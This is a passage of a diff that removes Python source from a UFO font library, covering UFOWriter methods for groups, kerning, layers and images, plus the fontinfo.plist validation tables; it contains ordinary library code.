- """ - path = fsdecode(path) - if self._havePreviousFile: - if self.fs.isfile(path) and data == self.fs.readbytes(path): - return - try: - self.fs.writebytes(path, data) - except fs.errors.FileExpected: - raise UFOLibError("A directory exists at '%s'" % path) - except fs.errors.ResourceNotFound: - self.fs.makedirs(fs.path.dirname(path), recreate=True) - self.fs.writebytes(path, data) - - def getFileObjectForPath(self, path, mode="w", encoding=None): - """ - Returns a file (or file-like) object for the - file at the given path. The path must be relative - to the UFO path. Returns None if the file does - not exist and the mode is "r" or "rb. - An encoding may be passed if the file is opened in text mode. - - Note: The caller is responsible for closing the open file. - """ - path = fsdecode(path) - try: - return self.fs.open(path, mode=mode, encoding=encoding) - except fs.errors.ResourceNotFound as e: - m = mode[0] - if m == "r": - # XXX I think we should just let it raise. The docstring, - # however, says that this returns None if mode is 'r' - return None - elif m == "w" or m == "a" or m == "x": - self.fs.makedirs(fs.path.dirname(path), recreate=True) - return self.fs.open(path, mode=mode, encoding=encoding) - except fs.errors.ResourceError as e: - return UFOLibError(f"unable to open '{path}' on {self.fs}: {e}") - - def removePath(self, path, force=False, removeEmptyParents=True): - """ - Remove the file (or directory) at path. The path - must be relative to the UFO. - Raises UFOLibError if the path doesn't exist. - If force=True, ignore non-existent paths. - If the directory where 'path' is located becomes empty, it will - be automatically removed, unless 'removeEmptyParents' is False. - """ - path = fsdecode(path) - try: - self.fs.remove(path) - except fs.errors.FileExpected: - self.fs.removetree(path) - except fs.errors.ResourceNotFound: - if not force: - raise UFOLibError(f"'{path}' does not exist on {self.fs}") - if removeEmptyParents: - parent = fs.path.dirname(path) - if parent: - fs.tools.remove_empty(self.fs, parent) - - # alias kept for backward compatibility with old API - removeFileForPath = removePath - - # UFO mod time - - def setModificationTime(self): - """ - Set the UFO modification time to the current time. - This is never called automatically. It is up to the - caller to call this when finished working on the UFO. - """ - path = self._path - if path is not None and os.path.exists(path): - try: - # this may fail on some filesystems (e.g. SMB servers) - os.utime(path, None) - except OSError as e: - logger.warning("Failed to set modified time: %s", e) - - # metainfo.plist - - def _writeMetaInfo(self): - metaInfo = dict( - creator=self._fileCreator, - formatVersion=self._formatVersion.major, - ) - if self._formatVersion.minor != 0: - metaInfo["formatVersionMinor"] = self._formatVersion.minor - self._writePlist(METAINFO_FILENAME, metaInfo) - - # groups.plist - - def setKerningGroupConversionRenameMaps(self, maps): - """ - Set maps defining the renaming that should be done - when writing groups and kerning in UFO 1 and UFO 2. - This will effectively undo the conversion done when - UFOReader reads this data. The dictionary should have - this form:: - - { - "side1" : {"group name to use when writing" : "group name in data"}, - "side2" : {"group name to use when writing" : "group name in data"} - } - - This is the same form returned by UFOReader's - getKerningGroupConversionRenameMaps method. 
- """ - if self._formatVersion >= UFOFormatVersion.FORMAT_3_0: - return # XXX raise an error here - # flip the dictionaries - remap = {} - for side in ("side1", "side2"): - for writeName, dataName in list(maps[side].items()): - remap[dataName] = writeName - self._downConversionKerningData = dict(groupRenameMap=remap) - - def writeGroups(self, groups, validate=None): - """ - Write groups.plist. This method requires a - dict of glyph groups as an argument. - - ``validate`` will validate the data, by default it is set to the - class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - # validate the data structure - if validate: - valid, message = groupsValidator(groups) - if not valid: - raise UFOLibError(message) - # down convert - if ( - self._formatVersion < UFOFormatVersion.FORMAT_3_0 - and self._downConversionKerningData is not None - ): - remap = self._downConversionKerningData["groupRenameMap"] - remappedGroups = {} - # there are some edge cases here that are ignored: - # 1. if a group is being renamed to a name that - # already exists, the existing group is always - # overwritten. (this is why there are two loops - # below.) there doesn't seem to be a logical - # solution to groups mismatching and overwriting - # with the specifiecd group seems like a better - # solution than throwing an error. - # 2. if side 1 and side 2 groups are being renamed - # to the same group name there is no check to - # ensure that the contents are identical. that - # is left up to the caller. - for name, contents in list(groups.items()): - if name in remap: - continue - remappedGroups[name] = contents - for name, contents in list(groups.items()): - if name not in remap: - continue - name = remap[name] - remappedGroups[name] = contents - groups = remappedGroups - # pack and write - groupsNew = {} - for key, value in groups.items(): - groupsNew[key] = list(value) - if groupsNew: - self._writePlist(GROUPS_FILENAME, groupsNew) - elif self._havePreviousFile: - self.removePath(GROUPS_FILENAME, force=True, removeEmptyParents=False) - - # fontinfo.plist - - def writeInfo(self, info, validate=None): - """ - Write info.plist. This method requires an object - that supports getting attributes that follow the - fontinfo.plist version 2 specification. Attributes - will be taken from the given object and written - into the file. - - ``validate`` will validate the data, by default it is set to the - class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - # gather version 3 data - infoData = {} - for attr in list(fontInfoAttributesVersion3ValueData.keys()): - if hasattr(info, attr): - try: - value = getattr(info, attr) - except AttributeError: - raise UFOLibError( - "The supplied info object does not support getting a necessary attribute (%s)." 
- % attr - ) - if value is None: - continue - infoData[attr] = value - # down convert data if necessary and validate - if self._formatVersion == UFOFormatVersion.FORMAT_3_0: - if validate: - infoData = validateInfoVersion3Data(infoData) - elif self._formatVersion == UFOFormatVersion.FORMAT_2_0: - infoData = _convertFontInfoDataVersion3ToVersion2(infoData) - if validate: - infoData = validateInfoVersion2Data(infoData) - elif self._formatVersion == UFOFormatVersion.FORMAT_1_0: - infoData = _convertFontInfoDataVersion3ToVersion2(infoData) - if validate: - infoData = validateInfoVersion2Data(infoData) - infoData = _convertFontInfoDataVersion2ToVersion1(infoData) - # write file if there is anything to write - if infoData: - self._writePlist(FONTINFO_FILENAME, infoData) - - # kerning.plist - - def writeKerning(self, kerning, validate=None): - """ - Write kerning.plist. This method requires a - dict of kerning pairs as an argument. - - This performs basic structural validation of the kerning, - but it does not check for compliance with the spec in - regards to conflicting pairs. The assumption is that the - kerning data being passed is standards compliant. - - ``validate`` will validate the data, by default it is set to the - class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - # validate the data structure - if validate: - invalidFormatMessage = "The kerning is not properly formatted." - if not isDictEnough(kerning): - raise UFOLibError(invalidFormatMessage) - for pair, value in list(kerning.items()): - if not isinstance(pair, (list, tuple)): - raise UFOLibError(invalidFormatMessage) - if not len(pair) == 2: - raise UFOLibError(invalidFormatMessage) - if not isinstance(pair[0], str): - raise UFOLibError(invalidFormatMessage) - if not isinstance(pair[1], str): - raise UFOLibError(invalidFormatMessage) - if not isinstance(value, numberTypes): - raise UFOLibError(invalidFormatMessage) - # down convert - if ( - self._formatVersion < UFOFormatVersion.FORMAT_3_0 - and self._downConversionKerningData is not None - ): - remap = self._downConversionKerningData["groupRenameMap"] - remappedKerning = {} - for (side1, side2), value in list(kerning.items()): - side1 = remap.get(side1, side1) - side2 = remap.get(side2, side2) - remappedKerning[side1, side2] = value - kerning = remappedKerning - # pack and write - kerningDict = {} - for left, right in kerning.keys(): - value = kerning[left, right] - if left not in kerningDict: - kerningDict[left] = {} - kerningDict[left][right] = value - if kerningDict: - self._writePlist(KERNING_FILENAME, kerningDict) - elif self._havePreviousFile: - self.removePath(KERNING_FILENAME, force=True, removeEmptyParents=False) - - # lib.plist - - def writeLib(self, libDict, validate=None): - """ - Write lib.plist. This method requires a - lib dict as an argument. - - ``validate`` will validate the data, by default it is set to the - class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - if validate: - valid, message = fontLibValidator(libDict) - if not valid: - raise UFOLibError(message) - if libDict: - self._writePlist(LIB_FILENAME, libDict) - elif self._havePreviousFile: - self.removePath(LIB_FILENAME, force=True, removeEmptyParents=False) - - # features.fea - - def writeFeatures(self, features, validate=None): - """ - Write features.fea. This method requires a - features string as an argument. 
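# Write-side sketch for writeInfo/writeLib/writeFeatures above; a fresh UFO 3
# package is created. The info object only needs attributes named after
# fontinfo.plist keys, so SimpleNamespace is enough here and the values are
# illustrative:
from types import SimpleNamespace
from fontTools.ufoLib import UFOWriter

info = SimpleNamespace(familyName="Demo Sans", styleName="Regular", unitsPerEm=1000)

writer = UFOWriter("DemoSans-Regular.ufo")   # defaults to the latest UFO format, package structure
writer.writeInfo(info)
writer.writeLib({"public.glyphOrder": ["A", "B"]})
writer.writeFeatures("languagesystem DFLT dflt;\n")
writer.close()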
- """ - if validate is None: - validate = self._validate - if self._formatVersion == UFOFormatVersion.FORMAT_1_0: - raise UFOLibError("features.fea is not allowed in UFO Format Version 1.") - if validate: - if not isinstance(features, str): - raise UFOLibError("The features are not text.") - if features: - self.writeBytesToPath(FEATURES_FILENAME, features.encode("utf8")) - elif self._havePreviousFile: - self.removePath(FEATURES_FILENAME, force=True, removeEmptyParents=False) - - # glyph sets & layers - - def writeLayerContents(self, layerOrder=None, validate=None): - """ - Write the layercontents.plist file. This method *must* be called - after all glyph sets have been written. - """ - if validate is None: - validate = self._validate - if self._formatVersion < UFOFormatVersion.FORMAT_3_0: - return - if layerOrder is not None: - newOrder = [] - for layerName in layerOrder: - if layerName is None: - layerName = DEFAULT_LAYER_NAME - newOrder.append(layerName) - layerOrder = newOrder - else: - layerOrder = list(self.layerContents.keys()) - if validate and set(layerOrder) != set(self.layerContents.keys()): - raise UFOLibError( - "The layer order content does not match the glyph sets that have been created." - ) - layerContents = [ - (layerName, self.layerContents[layerName]) for layerName in layerOrder - ] - self._writePlist(LAYERCONTENTS_FILENAME, layerContents) - - def _findDirectoryForLayerName(self, layerName): - foundDirectory = None - for existingLayerName, directoryName in list(self.layerContents.items()): - if layerName is None and directoryName == DEFAULT_GLYPHS_DIRNAME: - foundDirectory = directoryName - break - elif existingLayerName == layerName: - foundDirectory = directoryName - break - if not foundDirectory: - raise UFOLibError( - "Could not locate a glyph set directory for the layer named %s." - % layerName - ) - return foundDirectory - - def getGlyphSet( - self, - layerName=None, - defaultLayer=True, - glyphNameToFileNameFunc=None, - validateRead=None, - validateWrite=None, - expectContentsFile=False, - ): - """ - Return the GlyphSet object associated with the - appropriate glyph directory in the .ufo. - If layerName is None, the default glyph set - will be used. The defaultLayer flag indictes - that the layer should be saved into the default - glyphs directory. - - ``validateRead`` will validate the read data, by default it is set to the - class's validate value, can be overridden. - ``validateWrte`` will validate the written data, by default it is set to the - class's validate value, can be overridden. - ``expectContentsFile`` will raise a GlifLibError if a contents.plist file is - not found on the glyph set file system. This should be set to ``True`` if you - are reading an existing UFO and ``False`` if you use ``getGlyphSet`` to create - a fresh glyph set. - """ - if validateRead is None: - validateRead = self._validate - if validateWrite is None: - validateWrite = self._validate - # only default can be written in < 3 - if self._formatVersion < UFOFormatVersion.FORMAT_3_0 and ( - not defaultLayer or layerName is not None - ): - raise UFOLibError( - f"Only the default layer can be writen in UFO {self._formatVersion.major}." 
- ) - # locate a layer name when None has been given - if layerName is None and defaultLayer: - for existingLayerName, directory in self.layerContents.items(): - if directory == DEFAULT_GLYPHS_DIRNAME: - layerName = existingLayerName - if layerName is None: - layerName = DEFAULT_LAYER_NAME - elif layerName is None and not defaultLayer: - raise UFOLibError("A layer name must be provided for non-default layers.") - # move along to format specific writing - if self._formatVersion < UFOFormatVersion.FORMAT_3_0: - return self._getDefaultGlyphSet( - validateRead, - validateWrite, - glyphNameToFileNameFunc=glyphNameToFileNameFunc, - expectContentsFile=expectContentsFile, - ) - elif self._formatVersion.major == UFOFormatVersion.FORMAT_3_0.major: - return self._getGlyphSetFormatVersion3( - validateRead, - validateWrite, - layerName=layerName, - defaultLayer=defaultLayer, - glyphNameToFileNameFunc=glyphNameToFileNameFunc, - expectContentsFile=expectContentsFile, - ) - else: - raise NotImplementedError(self._formatVersion) - - def _getDefaultGlyphSet( - self, - validateRead, - validateWrite, - glyphNameToFileNameFunc=None, - expectContentsFile=False, - ): - from fontTools.ufoLib.glifLib import GlyphSet - - glyphSubFS = self.fs.makedir(DEFAULT_GLYPHS_DIRNAME, recreate=True) - return GlyphSet( - glyphSubFS, - glyphNameToFileNameFunc=glyphNameToFileNameFunc, - ufoFormatVersion=self._formatVersion, - validateRead=validateRead, - validateWrite=validateWrite, - expectContentsFile=expectContentsFile, - ) - - def _getGlyphSetFormatVersion3( - self, - validateRead, - validateWrite, - layerName=None, - defaultLayer=True, - glyphNameToFileNameFunc=None, - expectContentsFile=False, - ): - from fontTools.ufoLib.glifLib import GlyphSet - - # if the default flag is on, make sure that the default in the file - # matches the default being written. also make sure that this layer - # name is not already linked to a non-default layer. - if defaultLayer: - for existingLayerName, directory in self.layerContents.items(): - if directory == DEFAULT_GLYPHS_DIRNAME: - if existingLayerName != layerName: - raise UFOLibError( - "Another layer ('%s') is already mapped to the default directory." - % existingLayerName - ) - elif existingLayerName == layerName: - raise UFOLibError( - "The layer name is already mapped to a non-default layer." - ) - # get an existing directory name - if layerName in self.layerContents: - directory = self.layerContents[layerName] - # get a new directory name - else: - if defaultLayer: - directory = DEFAULT_GLYPHS_DIRNAME - else: - # not caching this could be slightly expensive, - # but caching it will be cumbersome - existing = {d.lower() for d in self.layerContents.values()} - directory = userNameToFileName( - layerName, existing=existing, prefix="glyphs." - ) - # make the directory - glyphSubFS = self.fs.makedir(directory, recreate=True) - # store the mapping - self.layerContents[layerName] = directory - # load the glyph set - return GlyphSet( - glyphSubFS, - glyphNameToFileNameFunc=glyphNameToFileNameFunc, - ufoFormatVersion=self._formatVersion, - validateRead=validateRead, - validateWrite=validateWrite, - expectContentsFile=expectContentsFile, - ) - - def renameGlyphSet(self, layerName, newLayerName, defaultLayer=False): - """ - Rename a glyph set. - - Note: if a GlyphSet object has already been retrieved for - layerName, it is up to the caller to inform that object that - the directory it represents has changed. 
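# Layer-handling sketch for the writer-side getGlyphSet above; layer names and
# the path are illustrative. writeLayerContents must be called once all glyph
# sets have been created:
from fontTools.ufoLib import UFOWriter

writer = UFOWriter("Layered.ufo")
foreground = writer.getGlyphSet()                                   # default layer ("public.default")
background = writer.getGlyphSet("public.background", defaultLayer=False)
# ... write glyphs into the two GlyphSet objects here ...
writer.writeLayerContents(layerOrder=["public.default", "public.background"])
writer.close()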
- """ - if self._formatVersion < UFOFormatVersion.FORMAT_3_0: - # ignore renaming glyph sets for UFO1 UFO2 - # just write the data from the default layer - return - # the new and old names can be the same - # as long as the default is being switched - if layerName == newLayerName: - # if the default is off and the layer is already not the default, skip - if ( - self.layerContents[layerName] != DEFAULT_GLYPHS_DIRNAME - and not defaultLayer - ): - return - # if the default is on and the layer is already the default, skip - if self.layerContents[layerName] == DEFAULT_GLYPHS_DIRNAME and defaultLayer: - return - else: - # make sure the new layer name doesn't already exist - if newLayerName is None: - newLayerName = DEFAULT_LAYER_NAME - if newLayerName in self.layerContents: - raise UFOLibError("A layer named %s already exists." % newLayerName) - # make sure the default layer doesn't already exist - if defaultLayer and DEFAULT_GLYPHS_DIRNAME in self.layerContents.values(): - raise UFOLibError("A default layer already exists.") - # get the paths - oldDirectory = self._findDirectoryForLayerName(layerName) - if defaultLayer: - newDirectory = DEFAULT_GLYPHS_DIRNAME - else: - existing = {name.lower() for name in self.layerContents.values()} - newDirectory = userNameToFileName( - newLayerName, existing=existing, prefix="glyphs." - ) - # update the internal mapping - del self.layerContents[layerName] - self.layerContents[newLayerName] = newDirectory - # do the file system copy - self.fs.movedir(oldDirectory, newDirectory, create=True) - - def deleteGlyphSet(self, layerName): - """ - Remove the glyph set matching layerName. - """ - if self._formatVersion < UFOFormatVersion.FORMAT_3_0: - # ignore deleting glyph sets for UFO1 UFO2 as there are no layers - # just write the data from the default layer - return - foundDirectory = self._findDirectoryForLayerName(layerName) - self.removePath(foundDirectory, removeEmptyParents=False) - del self.layerContents[layerName] - - def writeData(self, fileName, data): - """ - Write data to fileName in the 'data' directory. - The data must be a bytes string. - """ - self.writeBytesToPath(f"{DATA_DIRNAME}/{fsdecode(fileName)}", data) - - def removeData(self, fileName): - """ - Remove the file named fileName from the data directory. - """ - self.removePath(f"{DATA_DIRNAME}/{fsdecode(fileName)}") - - # /images - - def writeImage(self, fileName, data, validate=None): - """ - Write data to fileName in the images directory. - The data must be a valid PNG. - """ - if validate is None: - validate = self._validate - if self._formatVersion < UFOFormatVersion.FORMAT_3_0: - raise UFOLibError( - f"Images are not allowed in UFO {self._formatVersion.major}." - ) - fileName = fsdecode(fileName) - if validate: - valid, error = pngValidator(data=data) - if not valid: - raise UFOLibError(error) - self.writeBytesToPath(f"{IMAGES_DIRNAME}/{fileName}", data) - - def removeImage(self, fileName, validate=None): # XXX remove unused 'validate'? - """ - Remove the file named fileName from the - images directory. - """ - if self._formatVersion < UFOFormatVersion.FORMAT_3_0: - raise UFOLibError( - f"Images are not allowed in UFO {self._formatVersion.major}." - ) - self.removePath(f"{IMAGES_DIRNAME}/{fsdecode(fileName)}") - - def copyImageFromReader(self, reader, sourceFileName, destFileName, validate=None): - """ - Copy the sourceFileName in the provided UFOReader to destFileName - in this writer. This uses the most memory efficient method possible - for copying the data possible. 
- """ - if validate is None: - validate = self._validate - if self._formatVersion < UFOFormatVersion.FORMAT_3_0: - raise UFOLibError( - f"Images are not allowed in UFO {self._formatVersion.major}." - ) - sourcePath = f"{IMAGES_DIRNAME}/{fsdecode(sourceFileName)}" - destPath = f"{IMAGES_DIRNAME}/{fsdecode(destFileName)}" - self.copyFromReader(reader, sourcePath, destPath) - - def close(self): - if self._havePreviousFile and self._fileStructure is UFOFileStructure.ZIP: - # if we are updating an existing zip file, we can now compress the - # contents of the temporary filesystem in the destination path - rootDir = os.path.splitext(os.path.basename(self._path))[0] + ".ufo" - with fs.zipfs.ZipFS(self._path, write=True, encoding="utf-8") as destFS: - fs.copy.copy_fs(self.fs, destFS.makedir(rootDir)) - super().close() - - -# just an alias, makes it more explicit -UFOReaderWriter = UFOWriter - - -# ---------------- -# Helper Functions -# ---------------- - - -def _sniffFileStructure(ufo_path): - """Return UFOFileStructure.ZIP if the UFO at path 'ufo_path' (str) - is a zip file, else return UFOFileStructure.PACKAGE if 'ufo_path' is a - directory. - Raise UFOLibError if it is a file with unknown structure, or if the path - does not exist. - """ - if zipfile.is_zipfile(ufo_path): - return UFOFileStructure.ZIP - elif os.path.isdir(ufo_path): - return UFOFileStructure.PACKAGE - elif os.path.isfile(ufo_path): - raise UFOLibError( - "The specified UFO does not have a known structure: '%s'" % ufo_path - ) - else: - raise UFOLibError("No such file or directory: '%s'" % ufo_path) - - -def makeUFOPath(path): - """ - Return a .ufo pathname. - - >>> makeUFOPath("directory/something.ext") == ( - ... os.path.join('directory', 'something.ufo')) - True - >>> makeUFOPath("directory/something.another.thing.ext") == ( - ... os.path.join('directory', 'something.another.thing.ufo')) - True - """ - dir, name = os.path.split(path) - name = ".".join([".".join(name.split(".")[:-1]), "ufo"]) - return os.path.join(dir, name) - - -# ---------------------- -# fontinfo.plist Support -# ---------------------- - -# Version Validators - -# There is no version 1 validator and there shouldn't be. -# The version 1 spec was very loose and there were numerous -# cases of invalid values. - - -def validateFontInfoVersion2ValueForAttribute(attr, value): - """ - This performs very basic validation of the value for attribute - following the UFO 2 fontinfo.plist specification. The results - of this should not be interpretted as *correct* for the font - that they are part of. This merely indicates that the value - is of the proper type and, where the specification defines - a set range of possible values for an attribute, that the - value is in the accepted range. - """ - dataValidationDict = fontInfoAttributesVersion2ValueData[attr] - valueType = dataValidationDict.get("type") - validator = dataValidationDict.get("valueValidator") - valueOptions = dataValidationDict.get("valueOptions") - # have specific options for the validator - if valueOptions is not None: - isValidValue = validator(value, valueOptions) - # no specific options - else: - if validator == genericTypeValidator: - isValidValue = validator(value, valueType) - else: - isValidValue = validator(value) - return isValidValue - - -def validateInfoVersion2Data(infoData): - """ - This performs very basic validation of the value for infoData - following the UFO 2 fontinfo.plist specification. 
The results - of this should not be interpretted as *correct* for the font - that they are part of. This merely indicates that the values - are of the proper type and, where the specification defines - a set range of possible values for an attribute, that the - value is in the accepted range. - """ - validInfoData = {} - for attr, value in list(infoData.items()): - isValidValue = validateFontInfoVersion2ValueForAttribute(attr, value) - if not isValidValue: - raise UFOLibError(f"Invalid value for attribute {attr} ({value!r}).") - else: - validInfoData[attr] = value - return validInfoData - - -def validateFontInfoVersion3ValueForAttribute(attr, value): - """ - This performs very basic validation of the value for attribute - following the UFO 3 fontinfo.plist specification. The results - of this should not be interpretted as *correct* for the font - that they are part of. This merely indicates that the value - is of the proper type and, where the specification defines - a set range of possible values for an attribute, that the - value is in the accepted range. - """ - dataValidationDict = fontInfoAttributesVersion3ValueData[attr] - valueType = dataValidationDict.get("type") - validator = dataValidationDict.get("valueValidator") - valueOptions = dataValidationDict.get("valueOptions") - # have specific options for the validator - if valueOptions is not None: - isValidValue = validator(value, valueOptions) - # no specific options - else: - if validator == genericTypeValidator: - isValidValue = validator(value, valueType) - else: - isValidValue = validator(value) - return isValidValue - - -def validateInfoVersion3Data(infoData): - """ - This performs very basic validation of the value for infoData - following the UFO 3 fontinfo.plist specification. The results - of this should not be interpretted as *correct* for the font - that they are part of. This merely indicates that the values - are of the proper type and, where the specification defines - a set range of possible values for an attribute, that the - value is in the accepted range. - """ - validInfoData = {} - for attr, value in list(infoData.items()): - isValidValue = validateFontInfoVersion3ValueForAttribute(attr, value) - if not isValidValue: - raise UFOLibError(f"Invalid value for attribute {attr} ({value!r}).") - else: - validInfoData[attr] = value - return validInfoData - - -# Value Options - -fontInfoOpenTypeHeadFlagsOptions = list(range(0, 15)) -fontInfoOpenTypeOS2SelectionOptions = [1, 2, 3, 4, 7, 8, 9] -fontInfoOpenTypeOS2UnicodeRangesOptions = list(range(0, 128)) -fontInfoOpenTypeOS2CodePageRangesOptions = list(range(0, 64)) -fontInfoOpenTypeOS2TypeOptions = [0, 1, 2, 3, 8, 9] - -# Version Attribute Definitions -# This defines the attributes, types and, in some -# cases the possible values, that can exist is -# fontinfo.plist. 
- -fontInfoAttributesVersion1 = { - "familyName", - "styleName", - "fullName", - "fontName", - "menuName", - "fontStyle", - "note", - "versionMajor", - "versionMinor", - "year", - "copyright", - "notice", - "trademark", - "license", - "licenseURL", - "createdBy", - "designer", - "designerURL", - "vendorURL", - "unitsPerEm", - "ascender", - "descender", - "capHeight", - "xHeight", - "defaultWidth", - "slantAngle", - "italicAngle", - "widthName", - "weightName", - "weightValue", - "fondName", - "otFamilyName", - "otStyleName", - "otMacName", - "msCharSet", - "fondID", - "uniqueID", - "ttVendor", - "ttUniqueID", - "ttVersion", -} - -fontInfoAttributesVersion2ValueData = { - "familyName": dict(type=str), - "styleName": dict(type=str), - "styleMapFamilyName": dict(type=str), - "styleMapStyleName": dict( - type=str, valueValidator=fontInfoStyleMapStyleNameValidator - ), - "versionMajor": dict(type=int), - "versionMinor": dict(type=int), - "year": dict(type=int), - "copyright": dict(type=str), - "trademark": dict(type=str), - "unitsPerEm": dict(type=(int, float)), - "descender": dict(type=(int, float)), - "xHeight": dict(type=(int, float)), - "capHeight": dict(type=(int, float)), - "ascender": dict(type=(int, float)), - "italicAngle": dict(type=(float, int)), - "note": dict(type=str), - "openTypeHeadCreated": dict( - type=str, valueValidator=fontInfoOpenTypeHeadCreatedValidator - ), - "openTypeHeadLowestRecPPEM": dict(type=(int, float)), - "openTypeHeadFlags": dict( - type="integerList", - valueValidator=genericIntListValidator, - valueOptions=fontInfoOpenTypeHeadFlagsOptions, - ), - "openTypeHheaAscender": dict(type=(int, float)), - "openTypeHheaDescender": dict(type=(int, float)), - "openTypeHheaLineGap": dict(type=(int, float)), - "openTypeHheaCaretSlopeRise": dict(type=int), - "openTypeHheaCaretSlopeRun": dict(type=int), - "openTypeHheaCaretOffset": dict(type=(int, float)), - "openTypeNameDesigner": dict(type=str), - "openTypeNameDesignerURL": dict(type=str), - "openTypeNameManufacturer": dict(type=str), - "openTypeNameManufacturerURL": dict(type=str), - "openTypeNameLicense": dict(type=str), - "openTypeNameLicenseURL": dict(type=str), - "openTypeNameVersion": dict(type=str), - "openTypeNameUniqueID": dict(type=str), - "openTypeNameDescription": dict(type=str), - "openTypeNamePreferredFamilyName": dict(type=str), - "openTypeNamePreferredSubfamilyName": dict(type=str), - "openTypeNameCompatibleFullName": dict(type=str), - "openTypeNameSampleText": dict(type=str), - "openTypeNameWWSFamilyName": dict(type=str), - "openTypeNameWWSSubfamilyName": dict(type=str), - "openTypeOS2WidthClass": dict( - type=int, valueValidator=fontInfoOpenTypeOS2WidthClassValidator - ), - "openTypeOS2WeightClass": dict( - type=int, valueValidator=fontInfoOpenTypeOS2WeightClassValidator - ), - "openTypeOS2Selection": dict( - type="integerList", - valueValidator=genericIntListValidator, - valueOptions=fontInfoOpenTypeOS2SelectionOptions, - ), - "openTypeOS2VendorID": dict(type=str), - "openTypeOS2Panose": dict( - type="integerList", valueValidator=fontInfoVersion2OpenTypeOS2PanoseValidator - ), - "openTypeOS2FamilyClass": dict( - type="integerList", valueValidator=fontInfoOpenTypeOS2FamilyClassValidator - ), - "openTypeOS2UnicodeRanges": dict( - type="integerList", - valueValidator=genericIntListValidator, - valueOptions=fontInfoOpenTypeOS2UnicodeRangesOptions, - ), - "openTypeOS2CodePageRanges": dict( - type="integerList", - valueValidator=genericIntListValidator, - valueOptions=fontInfoOpenTypeOS2CodePageRangesOptions, 
- ), - "openTypeOS2TypoAscender": dict(type=(int, float)), - "openTypeOS2TypoDescender": dict(type=(int, float)), - "openTypeOS2TypoLineGap": dict(type=(int, float)), - "openTypeOS2WinAscent": dict(type=(int, float)), - "openTypeOS2WinDescent": dict(type=(int, float)), - "openTypeOS2Type": dict( - type="integerList", - valueValidator=genericIntListValidator, - valueOptions=fontInfoOpenTypeOS2TypeOptions, - ), - "openTypeOS2SubscriptXSize": dict(type=(int, float)), - "openTypeOS2SubscriptYSize": dict(type=(int, float)), - "openTypeOS2SubscriptXOffset": dict(type=(int, float)), - "openTypeOS2SubscriptYOffset": dict(type=(int, float)), - "openTypeOS2SuperscriptXSize": dict(type=(int, float)), - "openTypeOS2SuperscriptYSize": dict(type=(int, float)), - "openTypeOS2SuperscriptXOffset": dict(type=(int, float)), - "openTypeOS2SuperscriptYOffset": dict(type=(int, float)), - "openTypeOS2StrikeoutSize": dict(type=(int, float)), - "openTypeOS2StrikeoutPosition": dict(type=(int, float)), - "openTypeVheaVertTypoAscender": dict(type=(int, float)), - "openTypeVheaVertTypoDescender": dict(type=(int, float)), - "openTypeVheaVertTypoLineGap": dict(type=(int, float)), - "openTypeVheaCaretSlopeRise": dict(type=int), - "openTypeVheaCaretSlopeRun": dict(type=int), - "openTypeVheaCaretOffset": dict(type=(int, float)), - "postscriptFontName": dict(type=str), - "postscriptFullName": dict(type=str), - "postscriptSlantAngle": dict(type=(float, int)), - "postscriptUniqueID": dict(type=int), - "postscriptUnderlineThickness": dict(type=(int, float)), - "postscriptUnderlinePosition": dict(type=(int, float)), - "postscriptIsFixedPitch": dict(type=bool), - "postscriptBlueValues": dict( - type="integerList", valueValidator=fontInfoPostscriptBluesValidator - ), - "postscriptOtherBlues": dict( - type="integerList", valueValidator=fontInfoPostscriptOtherBluesValidator - ), - "postscriptFamilyBlues": dict( - type="integerList", valueValidator=fontInfoPostscriptBluesValidator - ), - "postscriptFamilyOtherBlues": dict( - type="integerList", valueValidator=fontInfoPostscriptOtherBluesValidator - ), - "postscriptStemSnapH": dict( - type="integerList", valueValidator=fontInfoPostscriptStemsValidator - ), - "postscriptStemSnapV": dict( - type="integerList", valueValidator=fontInfoPostscriptStemsValidator - ), - "postscriptBlueFuzz": dict(type=(int, float)), - "postscriptBlueShift": dict(type=(int, float)), - "postscriptBlueScale": dict(type=(float, int)), - "postscriptForceBold": dict(type=bool), - "postscriptDefaultWidthX": dict(type=(int, float)), - "postscriptNominalWidthX": dict(type=(int, float)), - "postscriptWeightName": dict(type=str), - "postscriptDefaultCharacter": dict(type=str), - "postscriptWindowsCharacterSet": dict( - type=int, valueValidator=fontInfoPostscriptWindowsCharacterSetValidator - ), - "macintoshFONDFamilyID": dict(type=int), - "macintoshFONDName": dict(type=str), -} -fontInfoAttributesVersion2 = set(fontInfoAttributesVersion2ValueData.keys()) - -fontInfoAttributesVersion3ValueData = deepcopy(fontInfoAttributesVersion2ValueData) -fontInfoAttributesVersion3ValueData.update( - { - "versionMinor": dict(type=int, valueValidator=genericNonNegativeIntValidator), - "unitsPerEm": dict( - type=(int, float), valueValidator=genericNonNegativeNumberValidator - ), - "openTypeHeadLowestRecPPEM": dict( - type=int, valueValidator=genericNonNegativeNumberValidator - ), - "openTypeHheaAscender": dict(type=int), - "openTypeHheaDescender": dict(type=int), - "openTypeHheaLineGap": dict(type=int), - "openTypeHheaCaretOffset": 
dict(type=int), - "openTypeOS2Panose": dict( - type="integerList", - valueValidator=fontInfoVersion3OpenTypeOS2PanoseValidator, - ), - "openTypeOS2TypoAscender": dict(type=int), - "openTypeOS2TypoDescender": dict(type=int), - "openTypeOS2TypoLineGap": dict(type=int), - "openTypeOS2WinAscent": dict( - type=int, valueValidator=genericNonNegativeNumberValidator - ), - "openTypeOS2WinDescent": dict( - type=int, valueValidator=genericNonNegativeNumberValidator - ), - "openTypeOS2SubscriptXSize": dict(type=int), - "openTypeOS2SubscriptYSize": dict(type=int), - "openTypeOS2SubscriptXOffset": dict(type=int), - "openTypeOS2SubscriptYOffset": dict(type=int), - "openTypeOS2SuperscriptXSize": dict(type=int), - "openTypeOS2SuperscriptYSize": dict(type=int), - "openTypeOS2SuperscriptXOffset": dict(type=int), - "openTypeOS2SuperscriptYOffset": dict(type=int), - "openTypeOS2StrikeoutSize": dict(type=int), - "openTypeOS2StrikeoutPosition": dict(type=int), - "openTypeGaspRangeRecords": dict( - type="dictList", valueValidator=fontInfoOpenTypeGaspRangeRecordsValidator - ), - "openTypeNameRecords": dict( - type="dictList", valueValidator=fontInfoOpenTypeNameRecordsValidator - ), - "openTypeVheaVertTypoAscender": dict(type=int), - "openTypeVheaVertTypoDescender": dict(type=int), - "openTypeVheaVertTypoLineGap": dict(type=int), - "openTypeVheaCaretOffset": dict(type=int), - "woffMajorVersion": dict( - type=int, valueValidator=genericNonNegativeIntValidator - ), - 